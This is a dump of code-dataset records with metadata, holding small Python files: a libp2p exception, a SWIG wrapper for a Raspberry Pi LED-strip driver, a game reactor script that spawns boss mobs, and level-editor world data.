| 26
|
py
|
Python
|
Data_loader/__init__.py
|
Gorilla-Lab-SCUT/OrthDNNs
|
7391b1751334c485feea212a80abc4dc8430dc1e
|
[
"BSD-3-Clause"
] | 4
|
2021-07-15T07:34:30.000Z
|
2022-03-30T08:23:46.000Z
|
Data_loader/__init__.py
|
Gorilla-Lab-SCUT/OrthDNNs
|
7391b1751334c485feea212a80abc4dc8430dc1e
|
[
"BSD-3-Clause"
] | 1
|
2020-02-11T10:55:46.000Z
|
2020-02-11T10:55:46.000Z
|
Data_loader/__init__.py
|
Yuxin-Wen/OrthDNNs
|
7391b1751334c485feea212a80abc4dc8430dc1e
|
[
"BSD-3-Clause"
] | 1
|
2021-11-23T03:31:09.000Z
|
2021-11-23T03:31:09.000Z
|
from . import Data_loader
| 13
| 25
| 0.807692
| 4
| 26
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 26
| 1
| 26
| 26
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
269b2cbd75b429cf7d826f525f6550f5e4ca0eb6
| 98
|
py
|
Python
|
libp2p/security/exceptions.py
|
swedneck/py-libp2p
|
85457fa308100ed0e5802849bf3918ffae486239
|
[
"Apache-2.0",
"MIT"
] | 315
|
2019-02-13T01:29:09.000Z
|
2022-03-28T13:44:07.000Z
|
libp2p/security/exceptions.py
|
pipermerriam/py-libp2p
|
379a157d6b67e86a616b2458af519bbe5fb26a51
|
[
"Apache-2.0",
"MIT"
] | 249
|
2019-02-22T05:00:07.000Z
|
2022-03-29T16:30:46.000Z
|
libp2p/security/exceptions.py
|
ralexstokes/py-libp2p
|
5144ab82894623969cb17baf0d4c64bd0a274068
|
[
"Apache-2.0",
"MIT"
] | 77
|
2019-02-24T19:45:17.000Z
|
2022-03-30T03:20:09.000Z
|
from libp2p.exceptions import BaseLibp2pError
class HandshakeFailure(BaseLibp2pError):
pass
| 16.333333
| 45
| 0.826531
| 9
| 98
| 9
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035294
| 0.132653
| 98
| 5
| 46
| 19.6
| 0.917647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
26bf63467b3727e5b69099c0adfcc1778b9c0d0e
| 17,649
|
py
|
Python
|
ledcontrol/driver/ledcontrol_rpi_ws281x_driver.py
|
JosephAntony1/led-control
|
4dc49c5b57bb6fb66b00aac05b692ddabb857d6e
|
[
"MIT"
] | null | null | null |
ledcontrol/driver/ledcontrol_rpi_ws281x_driver.py
|
JosephAntony1/led-control
|
4dc49c5b57bb6fb66b00aac05b692ddabb857d6e
|
[
"MIT"
] | null | null | null |
ledcontrol/driver/ledcontrol_rpi_ws281x_driver.py
|
JosephAntony1/led-control
|
4dc49c5b57bb6fb66b00aac05b692ddabb857d6e
|
[
"MIT"
] | null | null | null |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 4.0.2
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info < (2, 7, 0):
raise RuntimeError("Python 2.7 or later required")
# Import the low-level C/C++ module
if __package__ or "." in __name__:
from . import _ledcontrol_rpi_ws281x_driver
else:
import _ledcontrol_rpi_ws281x_driver
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_repr(self):
    # repr for SWIG proxy objects: "<module.Class; proxy of ...>" built from
    # the underlying C object's repr.  If the C-level `this` pointer is not
    # attached yet (e.g. partially constructed proxy), fall back to an empty
    # proxy string instead of raising.
    try:
        strthis = "proxy of " + self.this.__repr__()
    except __builtin__.Exception:
        strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
def _swig_setattr_nondynamic_instance_variable(set):
    # Factory: wrap a __setattr__ implementation so SWIG proxy *instances*
    # only accept 'this', 'thisown', or names backed by an existing property
    # (i.e. attributes generated from the C struct) — anything else raises.
    def set_instance_attr(self, name, value):
        if name == "thisown":
            # Ownership flag is stored on the underlying C object wrapper.
            self.this.own(value)
        elif name == "this":
            set(self, name, value)
        elif hasattr(self, name) and isinstance(getattr(type(self), name), property):
            # Existing SWIG-generated property: delegate to the wrapped setter.
            set(self, name, value)
        else:
            raise AttributeError("You cannot add instance attributes to %s" % self)
    return set_instance_attr
def _swig_setattr_nondynamic_class_variable(set):
    # Factory: same nondynamic policy at the *class* level — only existing,
    # non-property class attributes may be rebound; new names raise.
    def set_class_attr(cls, name, value):
        if hasattr(cls, name) and not isinstance(getattr(cls, name), property):
            set(cls, name, value)
        else:
            raise AttributeError("You cannot add class attributes to %s" % cls)
    return set_class_attr
def _swig_add_metaclass(metaclass):
"""Class decorator for adding a metaclass to a SWIG wrapped class - a slimmed down version of six.add_metaclass"""
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class _SwigNonDynamicMeta(type):
"""Meta class to enforce nondynamic attributes (no new attributes) for a class"""
__setattr__ = _swig_setattr_nondynamic_class_variable(type.__setattr__)
WS2811_TARGET_FREQ = _ledcontrol_rpi_ws281x_driver.WS2811_TARGET_FREQ
SK6812_STRIP_RGBW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_RGBW
SK6812_STRIP_RBGW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_RBGW
SK6812_STRIP_GRBW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_GRBW
SK6812_STRIP_GBRW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_GBRW
SK6812_STRIP_BRGW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_BRGW
SK6812_STRIP_BGRW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_BGRW
SK6812_SHIFT_WMASK = _ledcontrol_rpi_ws281x_driver.SK6812_SHIFT_WMASK
WS2811_STRIP_RGB = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_RGB
WS2811_STRIP_RBG = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_RBG
WS2811_STRIP_GRB = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_GRB
WS2811_STRIP_GBR = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_GBR
WS2811_STRIP_BRG = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_BRG
WS2811_STRIP_BGR = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_BGR
WS2812_STRIP = _ledcontrol_rpi_ws281x_driver.WS2812_STRIP
SK6812_STRIP = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP
SK6812W_STRIP = _ledcontrol_rpi_ws281x_driver.SK6812W_STRIP
class ws2811_channel_t(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
gpionum = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gpionum_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gpionum_set)
invert = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_invert_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_invert_set)
count = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_count_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_count_set)
strip_type = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_strip_type_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_strip_type_set)
leds = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_leds_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_leds_set)
brightness = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_brightness_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_brightness_set)
wshift = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_wshift_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_wshift_set)
rshift = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_rshift_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_rshift_set)
gshift = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gshift_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gshift_set)
bshift = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_bshift_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_bshift_set)
gamma = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gamma_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gamma_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_ws2811_channel_t())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_ws2811_channel_t
# Register ws2811_channel_t in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_swigregister(ws2811_channel_t)
class ws2811_t(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
render_wait_time = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_render_wait_time_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_render_wait_time_set)
device = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_device_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_device_set)
rpi_hw = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_rpi_hw_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_rpi_hw_set)
freq = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_freq_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_freq_set)
dmanum = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_dmanum_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_dmanum_set)
channel = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_channel_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_channel_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.ws2811_t_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_ws2811_t())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_ws2811_t
# Register ws2811_t in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.ws2811_t_swigregister(ws2811_t)
WS2811_SUCCESS = _ledcontrol_rpi_ws281x_driver.WS2811_SUCCESS
WS2811_ERROR_GENERIC = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_GENERIC
WS2811_ERROR_OUT_OF_MEMORY = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_OUT_OF_MEMORY
WS2811_ERROR_HW_NOT_SUPPORTED = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_HW_NOT_SUPPORTED
WS2811_ERROR_MEM_LOCK = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_MEM_LOCK
WS2811_ERROR_MMAP = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_MMAP
WS2811_ERROR_MAP_REGISTERS = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_MAP_REGISTERS
WS2811_ERROR_GPIO_INIT = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_GPIO_INIT
WS2811_ERROR_PWM_SETUP = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_PWM_SETUP
WS2811_ERROR_MAILBOX_DEVICE = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_MAILBOX_DEVICE
WS2811_ERROR_DMA = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_DMA
WS2811_ERROR_ILLEGAL_GPIO = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_ILLEGAL_GPIO
WS2811_ERROR_PCM_SETUP = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_PCM_SETUP
WS2811_ERROR_SPI_SETUP = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_SPI_SETUP
WS2811_ERROR_SPI_TRANSFER = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_SPI_TRANSFER
WS2811_RETURN_STATE_COUNT = _ledcontrol_rpi_ws281x_driver.WS2811_RETURN_STATE_COUNT
def ws2811_init(ws2811):
return _ledcontrol_rpi_ws281x_driver.ws2811_init(ws2811)
def ws2811_fini(ws2811):
return _ledcontrol_rpi_ws281x_driver.ws2811_fini(ws2811)
def ws2811_render(ws2811):
return _ledcontrol_rpi_ws281x_driver.ws2811_render(ws2811)
def ws2811_wait(ws2811):
return _ledcontrol_rpi_ws281x_driver.ws2811_wait(ws2811)
def ws2811_get_return_t_str(state):
return _ledcontrol_rpi_ws281x_driver.ws2811_get_return_t_str(state)
def ws2811_set_custom_gamma_factor(ws2811, gamma_factor):
return _ledcontrol_rpi_ws281x_driver.ws2811_set_custom_gamma_factor(ws2811, gamma_factor)
class color_hsv(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
hue = property(_ledcontrol_rpi_ws281x_driver.color_hsv_hue_get, _ledcontrol_rpi_ws281x_driver.color_hsv_hue_set)
h = property(_ledcontrol_rpi_ws281x_driver.color_hsv_h_get, _ledcontrol_rpi_ws281x_driver.color_hsv_h_set)
saturation = property(_ledcontrol_rpi_ws281x_driver.color_hsv_saturation_get, _ledcontrol_rpi_ws281x_driver.color_hsv_saturation_set)
sat = property(_ledcontrol_rpi_ws281x_driver.color_hsv_sat_get, _ledcontrol_rpi_ws281x_driver.color_hsv_sat_set)
s = property(_ledcontrol_rpi_ws281x_driver.color_hsv_s_get, _ledcontrol_rpi_ws281x_driver.color_hsv_s_set)
value = property(_ledcontrol_rpi_ws281x_driver.color_hsv_value_get, _ledcontrol_rpi_ws281x_driver.color_hsv_value_set)
val = property(_ledcontrol_rpi_ws281x_driver.color_hsv_val_get, _ledcontrol_rpi_ws281x_driver.color_hsv_val_set)
v = property(_ledcontrol_rpi_ws281x_driver.color_hsv_v_get, _ledcontrol_rpi_ws281x_driver.color_hsv_v_set)
raw = property(_ledcontrol_rpi_ws281x_driver.color_hsv_raw_get, _ledcontrol_rpi_ws281x_driver.color_hsv_raw_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.color_hsv_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_color_hsv())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_color_hsv
# Register color_hsv in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.color_hsv_swigregister(color_hsv)
class color_hsv_float(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
hue = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_hue_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_hue_set)
h = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_h_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_h_set)
saturation = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_saturation_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_saturation_set)
sat = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_sat_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_sat_set)
s = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_s_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_s_set)
value = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_value_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_value_set)
val = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_val_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_val_set)
v = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_v_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_v_set)
raw = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_raw_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_raw_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.color_hsv_float_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_color_hsv_float())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_color_hsv_float
# Register color_hsv_float in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.color_hsv_float_swigregister(color_hsv_float)
class color_rgb(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
red = property(_ledcontrol_rpi_ws281x_driver.color_rgb_red_get, _ledcontrol_rpi_ws281x_driver.color_rgb_red_set)
r = property(_ledcontrol_rpi_ws281x_driver.color_rgb_r_get, _ledcontrol_rpi_ws281x_driver.color_rgb_r_set)
green = property(_ledcontrol_rpi_ws281x_driver.color_rgb_green_get, _ledcontrol_rpi_ws281x_driver.color_rgb_green_set)
g = property(_ledcontrol_rpi_ws281x_driver.color_rgb_g_get, _ledcontrol_rpi_ws281x_driver.color_rgb_g_set)
blue = property(_ledcontrol_rpi_ws281x_driver.color_rgb_blue_get, _ledcontrol_rpi_ws281x_driver.color_rgb_blue_set)
b = property(_ledcontrol_rpi_ws281x_driver.color_rgb_b_get, _ledcontrol_rpi_ws281x_driver.color_rgb_b_set)
raw = property(_ledcontrol_rpi_ws281x_driver.color_rgb_raw_get, _ledcontrol_rpi_ws281x_driver.color_rgb_raw_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.color_rgb_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_color_rgb())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_color_rgb
# Register color_rgb in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.color_rgb_swigregister(color_rgb)
class color_rgb_float(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
red = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_red_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_red_set)
r = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_r_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_r_set)
green = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_green_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_green_set)
g = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_g_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_g_set)
blue = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_blue_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_blue_set)
b = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_b_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_b_set)
raw = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_raw_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_raw_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.color_rgb_float_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_color_rgb_float())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_color_rgb_float
# Register color_rgb_float in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.color_rgb_float_swigregister(color_rgb_float)
def ws2811_channel_get(ws, channelnum):
return _ledcontrol_rpi_ws281x_driver.ws2811_channel_get(ws, channelnum)
def ws2811_led_get(channel, lednum):
return _ledcontrol_rpi_ws281x_driver.ws2811_led_get(channel, lednum)
def ws2811_led_set(channel, lednum, color):
return _ledcontrol_rpi_ws281x_driver.ws2811_led_set(channel, lednum, color)
def unpack_rgb(_in):
return _ledcontrol_rpi_ws281x_driver.unpack_rgb(_in)
def pack_rgbw(r, g, b, w):
return _ledcontrol_rpi_ws281x_driver.pack_rgbw(r, g, b, w)
def scale_8(a, b):
return _ledcontrol_rpi_ws281x_driver.scale_8(a, b)
def clamp(d, min, max):
return _ledcontrol_rpi_ws281x_driver.clamp(d, min, max)
def blackbody_to_rgb(kelvin):
return _ledcontrol_rpi_ws281x_driver.blackbody_to_rgb(kelvin)
def blackbody_correction_rgb(rgb, kelvin):
return _ledcontrol_rpi_ws281x_driver.blackbody_correction_rgb(rgb, kelvin)
def render_hsv2rgb_rainbow_float(hsv, corr_rgb, saturation, brightness, gamma, has_white):
return _ledcontrol_rpi_ws281x_driver.render_hsv2rgb_rainbow_float(hsv, corr_rgb, saturation, brightness, gamma, has_white)
def render_rgb_float(rgb, corr_rgb, saturation, brightness, gamma, has_white):
return _ledcontrol_rpi_ws281x_driver.render_rgb_float(rgb, corr_rgb, saturation, brightness, gamma, has_white)
def ws2811_hsv_render_array_float(ws, channel, values, count, correction, saturation, brightness, gamma, has_white):
return _ledcontrol_rpi_ws281x_driver.ws2811_hsv_render_array_float(ws, channel, values, count, correction, saturation, brightness, gamma, has_white)
def ws2811_rgb_render_array_float(ws, channel, values, count, correction, saturation, brightness, gamma, has_white):
return _ledcontrol_rpi_ws281x_driver.ws2811_rgb_render_array_float(ws, channel, values, count, correction, saturation, brightness, gamma, has_white)
def float_to_int_1000(t):
return _ledcontrol_rpi_ws281x_driver.float_to_int_1000(t)
def float_to_int_1000_mirror(t):
return _ledcontrol_rpi_ws281x_driver.float_to_int_1000_mirror(t)
def wave_pulse(t, duty_cycle):
return _ledcontrol_rpi_ws281x_driver.wave_pulse(t, duty_cycle)
def wave_triangle(t):
return _ledcontrol_rpi_ws281x_driver.wave_triangle(t)
def wave_sine(t):
return _ledcontrol_rpi_ws281x_driver.wave_sine(t)
def wave_cubic(t):
return _ledcontrol_rpi_ws281x_driver.wave_cubic(t)
def plasma_sines(x, y, t, coeff_x, coeff_y, coeff_x_y, coeff_dist_xy):
return _ledcontrol_rpi_ws281x_driver.plasma_sines(x, y, t, coeff_x, coeff_y, coeff_x_y, coeff_dist_xy)
def plasma_sines_octave(x, y, t, octaves, lacunarity, persistence):
return _ledcontrol_rpi_ws281x_driver.plasma_sines_octave(x, y, t, octaves, lacunarity, persistence)
def fade(t):
return _ledcontrol_rpi_ws281x_driver.fade(t)
def lerp(t, a, b):
return _ledcontrol_rpi_ws281x_driver.lerp(t, a, b)
def grad(hash, x, y, z):
return _ledcontrol_rpi_ws281x_driver.grad(hash, x, y, z)
def perlin_noise_3d(x, y, z):
return _ledcontrol_rpi_ws281x_driver.perlin_noise_3d(x, y, z)
def fbm_noise_3d(x, y, z, octaves, lacunarity, persistence):
return _ledcontrol_rpi_ws281x_driver.fbm_noise_3d(x, y, z, octaves, lacunarity, persistence)
cvar = _ledcontrol_rpi_ws281x_driver.cvar
debug = cvar.debug
| 56.567308
| 153
| 0.840614
| 2,609
| 17,649
| 5.029513
| 0.097739
| 0.194178
| 0.283798
| 0.373419
| 0.794848
| 0.742798
| 0.652797
| 0.575446
| 0.354214
| 0.273434
| 0
| 0.075481
| 0.096209
| 17,649
| 311
| 154
| 56.749196
| 0.747163
| 0.042325
| 0
| 0.108225
| 1
| 0
| 0.01493
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.194805
| false
| 0
| 0.025974
| 0.142857
| 0.705628
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
26cbbfb7f976b07d0b7e861760295acf5e84ff9f
| 371
|
py
|
Python
|
scripts/reactor/easyhontaleBoss.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 54
|
2019-04-16T23:24:48.000Z
|
2021-12-18T11:41:50.000Z
|
scripts/reactor/easyhontaleBoss.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 3
|
2019-05-19T15:19:41.000Z
|
2020-04-27T16:29:16.000Z
|
scripts/reactor/easyhontaleBoss.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 49
|
2020-11-25T23:29:16.000Z
|
2022-03-26T16:20:24.000Z
|
# Easy horntail gem: spawn the nine horntail-part mobs at (95, 260),
# then remove this reactor so the script fires only once.
for gem_mob_id in (
    8810202, 8810203, 8810204, 8810205, 8810206,
    8810207, 8810208, 8810209, 8810214,
):
    sm.spawnMob(gem_mob_id, 95, 260, False)
sm.removeReactor()
| 33.727273
| 36
| 0.735849
| 59
| 371
| 4.627119
| 0.305085
| 0.32967
| 0.32967
| 0.395604
| 0.586081
| 0
| 0
| 0
| 0
| 0
| 0
| 0.326284
| 0.107817
| 371
| 11
| 37
| 33.727273
| 0.498489
| 0.045822
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f859e46592fe82127e26d25296c7b571674dc3d5
| 1,146
|
py
|
Python
|
pirates/leveleditor/worldData/GameAreaSandboxCaveA.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/GameAreaSandboxCaveA.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/GameAreaSandboxCaveA.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3
objectStruct = {'Objects': {'1163554532.64sdnaik': {'Type': 'Island Game Area','Name': 'GameAreaSandboxCaveA','Objects': {'1163718959.63sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_1','Hpr': VBase3(90.0, 0.0, 0.0),'Pos': Point3(520.909, -421.176, 52.838),'Scale': VBase3(1.0, 1.0, 1.0)},'1163718959.64sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_2','Hpr': VBase3(-90.0, 0.0, 0.0),'Pos': Point3(513.096, 103.973, 87.856),'Scale': VBase3(1.0, 1.0, 1.0)},'1163718959.66sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_3','Hpr': VBase3(1.188, -1.45, -0.338),'Pos': Point3(105.468, -363.345, 0.358),'Scale': VBase3(1.0, 1.0, 1.0)}},'Visual': {'Model': 'models/caves/cave_a_zero'}}},'Node Links': [],'Layers': {},'ObjectIds': {'1163554532.64sdnaik': '["Objects"]["1163554532.64sdnaik"]','1163718959.63sdnaik': '["Objects"]["1163554532.64sdnaik"]["Objects"]["1163718959.63sdnaik"]','1163718959.64sdnaik': '["Objects"]["1163554532.64sdnaik"]["Objects"]["1163718959.64sdnaik"]','1163718959.66sdnaik': '["Objects"]["1163554532.64sdnaik"]["Objects"]["1163718959.66sdnaik"]'}}
| 573
| 1,099
| 0.673647
| 156
| 1,146
| 4.897436
| 0.391026
| 0.02356
| 0.02356
| 0.031414
| 0.45288
| 0.287958
| 0.158377
| 0.158377
| 0.136126
| 0.065445
| 0
| 0.265005
| 0.054974
| 1,146
| 2
| 1,099
| 573
| 0.440443
| 0
| 0
| 0
| 0
| 0
| 0.568439
| 0.228422
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
f8cc4fce6f05b9e04e50b39d786edb012e3a2736
| 55
|
py
|
Python
|
enthought/traits/protocols/generate.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/traits/protocols/generate.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
